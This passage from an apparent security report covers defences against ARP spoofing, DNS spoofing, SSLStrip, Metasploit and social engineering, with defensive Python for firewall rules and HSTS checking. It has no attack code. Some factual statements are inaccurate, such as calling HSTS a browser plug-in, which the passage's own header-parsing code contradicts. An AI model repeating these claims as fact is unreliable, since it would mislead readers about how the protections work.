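    for ip, expected, seen in baseline_violations(table, BASELINE):
        print(f"{ip}: expected {expected}, cache now says {seen}")
    print("\n".join(static_arp_commands(BASELINE)))
```

Run it periodically (or feed it the output of arp -a on other platforms after adjusting the parser) and alert on either finding; a legitimate NIC replacement will show up as a baseline violation, which is exactly the moment to update the baseline deliberately rather than let the cache learn whatever it is told.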

Switch Hardening 

Like many switches, Cisco's IOS protects against ARP attacks. By limiting the number of hardware addresses per port to one, it ensures that a host cannot change its hardware address on the fly or map multiple MAC addresses to route traffic out of one port.

DNS Spoofing Attack: Firewall Protection 

SANS states “The IANA has assigned TCP and UDP ports 53 to DNS queries. If you are running a single purpose DNS server, then firewall rules should be written to only allow traffic to port 53 bound for the DNS server.” SANS summarizes that since TCP connections are established for zone transfers, the firewall should only allow TCP port 53 from authorized slave name servers.

Network Protection 

SANS notes that there is no legitimate reason for an external DNS server to receive queries from IANA private reserved source IP addresses as defined in RFC 1918. It also states that private addresses should never traverse an Internet router. Therefore, SANS considers it good practice to set up access lists on Internet routers to block all traffic from RFC 1918 address space.
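The firewall and router rules above amount to a small decision procedure, and writing it out makes the policy testable before it is deployed. As an added example (mine, not the report's and not SANS's text), the Python below evaluates a packet arriving on the Internet side against the rules quoted above: drop RFC 1918 sources, allow UDP 53 to the DNS server from anyone, and allow TCP 53 only from the authorized secondary name servers. It also renders the same policy as iptables commands. The DNS server address and the secondary server address are assumed values for this example.

```python
import ipaddress

# Assumed lab addresses for this example (not from the report): the single-purpose
# DNS server and the secondaries that are allowed to pull zone transfers.
DNS_SERVER = ipaddress.ip_address("203.0.113.53")
AUTHORIZED_SECONDARIES = {ipaddress.ip_address("198.51.100.10")}

# RFC 1918 private space, which should never arrive from the Internet side
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(src):
    """True when src falls inside any RFC 1918 block."""
    return any(src in net for net in RFC1918)


def dns_firewall_decision(src, dst, proto, dport):
    """Decide ('ALLOW'|'DROP', reason) for one inbound packet at the DNS firewall.

    Order matters: the router-level RFC 1918 block comes first, then the
    "only port 53 bound for the DNS server" rule, then the TCP/UDP split.
    """
    src = ipaddress.ip_address(src)
    dst = ipaddress.ip_address(dst)
    if is_private(src):
        return "DROP", "RFC 1918 source address on the Internet interface"
    if dst != DNS_SERVER or dport != 53:
        return "DROP", "only port 53 bound for the DNS server is permitted"
    if proto == "udp":
        return "ALLOW", "DNS query"
    if proto == "tcp" and src in AUTHORIZED_SECONDARIES:
        return "ALLOW", "zone transfer from an authorized secondary"
    return "DROP", "TCP/53 from a host that is not an authorized secondary"


def iptables_rules():
    """Render the same policy as Linux iptables commands, in matching order."""
    rules = [f"iptables -A INPUT -s {net} -j DROP" for net in RFC1918]
    rules.append(f"iptables -A INPUT -p udp -d {DNS_SERVER} --dport 53 -j ACCEPT")
    for secondary in sorted(AUTHORIZED_SECONDARIES):
        rules.append(f"iptables -A INPUT -p tcp -s {secondary} -d {DNS_SERVER} --dport 53 -j ACCEPT")
    rules.append(f"iptables -A INPUT -d {DNS_SERVER} -j DROP")
    return rules


if __name__ == "__main__":
    print(dns_firewall_decision("192.168.1.77", "203.0.113.53", "udp", 53))
    print(dns_firewall_decision("198.51.100.10", "203.0.113.53", "tcp", 53))
    print("\n".join(iptables_rules()))
```

One caveat a practitioner should weigh before copying the TCP rule: the SANS text dates from 2003, and modern resolvers fall back to TCP 53 for any response too large for UDP, so restricting TCP 53 to secondaries alone can break large answers; decide that per deployment rather than by default.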

DNS Management Software 

Software such as BIND can be used to manage DNS. The good thing about DNS management software is that it can automatically back up your current configuration data on the management server. "As soon as you have restored a hacked DNS server", SANS states, "you can quickly and easily generate the configuration files needed for BIND to function properly."



Defense Measures Against Exploits: (Continued)

SSLStrip Prevention: Education

We should educate the people using the network that it is definitely unsafe when they visit a site like paypal.com with no SSL encryption. It is easy for an attacker to get hold of important and valuable information just by sniffing.

Use HTTPS Plugins While Browsing 

HSTS is software that allows habitual web surfers to browse securely. It is built into Google Chrome and Firefox as a plug-in. It allows us to specify sites that are always HTTPS and make them stay that way.
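The "always HTTPS" behaviour the paragraph describes is driven by the Strict-Transport-Security response header a site sends on its first HTTPS visit; the browser remembers it and refuses to follow plain http:// links to that host for max-age seconds, which is what defeats a stripped link. As an added example (mine, not the report's), the Python below parses that header, rates the policy, and shows the remembered-host upgrade step a browser performs. The response headers and host names are constructed.

```python
from urllib.parse import urlparse

# Constructed response headers for this example (not captured from a real site).
SECURE_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload",
}
WEAK_HEADERS = {"Content-Type": "text/html"}


def parse_hsts(headers):
    """Parse the Strict-Transport-Security header (RFC 6797 directives).

    Returns None when the header is absent, otherwise a dict with max_age in
    seconds plus the include_subdomains and preload flags.
    """
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return None
    policy = {"max_age": 0, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            policy["max_age"] = int(arg.strip().strip('"'))
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy


def hsts_strength(headers, min_age=31536000):
    """Rate a policy: 'missing', 'weak' (short max-age or no subdomains) or
    'strong' (at least min_age seconds and includeSubDomains)."""
    policy = parse_hsts(headers)
    if policy is None:
        return "missing"
    if policy["max_age"] >= min_age and policy["include_subdomains"]:
        return "strong"
    return "weak"


def remember_policy(headers, host, known_hosts):
    """Record host in known_hosts when it sends a usable policy (max-age > 0),
    mirroring what the browser stores after a clean HTTPS visit."""
    policy = parse_hsts(headers)
    if policy and policy["max_age"] > 0:
        known_hosts.add(host.lower())
    return known_hosts


def upgrade_url(url, known_hosts):
    """Rewrite http:// to https:// for a remembered host before any request is
    sent, so a stripped plain-HTTP link to that host is never followed."""
    parts = urlparse(url)
    if parts.scheme == "http" and (parts.hostname or "").lower() in known_hosts:
        return parts._replace(scheme="https").geturl()
    return url
```

The limitation worth knowing is visible in remember_policy: the header has to be seen over HTTPS at least once, so the very first visit to a site is not protected unless the site is on the browser's preload list (the preload directive above is the site's request to be included in it).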

Prevention Against Armitage And Meterpreter (Metasploit) Attacks

Patching With The Latest Service Pack

Patching your system with the latest security service pack closes most of the holes already present in a system.

Running Processes With The Least Privileges 

We can limit exploitation by maximizing our defences and running software with the least privileges it needs, so that a software hole exposes as little as possible. You can then raise the security settings and limit network access to only trusted hosts within the system.

Prevention Against Social Engineering Toolkit And Social Engineering Attacks

Set Up A Security Awareness Program On Social Engineering Attacks:

Security "experts" must teach those who are less educated about security how to prevent social engineering attacks from happening. It should always be recommended that they are taught the tricks of the hacking trade. To defend against a hacker exploiting you through a malicious webpage, you must think like one and resist their snares.

Block Malicious Websites By Using Protected Safety Plugins 

When browsing the web for important information, it is easy to come across social engineering attacks on websites. You can use plugins to block you from visiting these sites; they will usually give you a rating of how safe a site is before you access it.

Update Your Virus/Malware Scanner To The Latest Definitions Often 

When you have a virus/malware scanner, keep it updated with the latest definitions so that if any threats or malicious payloads are detected, they won't seep through your system; instead they are caught and then quarantined.



Conclusions and Recommendations

To conclude, it is only right to understand the mindset and skillset of a hacker. That hacker's attack can be mitigated when we also have the right mindset to defend against his or her attacks. This cyber war isn't finished and never will be. So, we must keep updating our security, with the number one most important feature being an upgrade to our technobrain. After all, exploits of known vulnerabilities will never get through if we have the right patches and the right programmers to fix the bugs. Again, man-in-the-middle attacks can be stopped if intruder IP addresses are detected with fortified IDPSes before our networks get demolished. And meterpreter payloads wouldn't survive if the latest virus and malware definitions were scanned for. It is necessary to think like a hacker by doing what a hacker does, just as a monkey sees and a monkey does to replicate the mirror. We must also mirror attackers and protect victims by securing them with digital tourniquets that shield them from another digital attack. Although the sophistication of attacks in this day and age has skyrocketed, our goal should never be to stop protecting those we care about and care for.



References

1. Address Resolution Protocol Spoofing and Man-In-the-Middle Attacks (2006). SANS Institute InfoSec Reading Room.

2. A Proactive Defense to Social Engineering (2001). SANS Institute InfoSec Reading Room.

3. Defense in Depth for DNS (2003). SANS Institute InfoSec Reading Room.

4. Lewis, N. (2014, May 1). Stop attackers hacking with Metasploit. Retrieved July 19, 2015, from http://searchsecurity.techtarget.com/tip/Stop-attackers-hackingwith-Metasploit

5. Tzu, S., & Bowden, T. (2010). The Art of War: The Ancient Classic. Chichester: John Wiley & Sons.

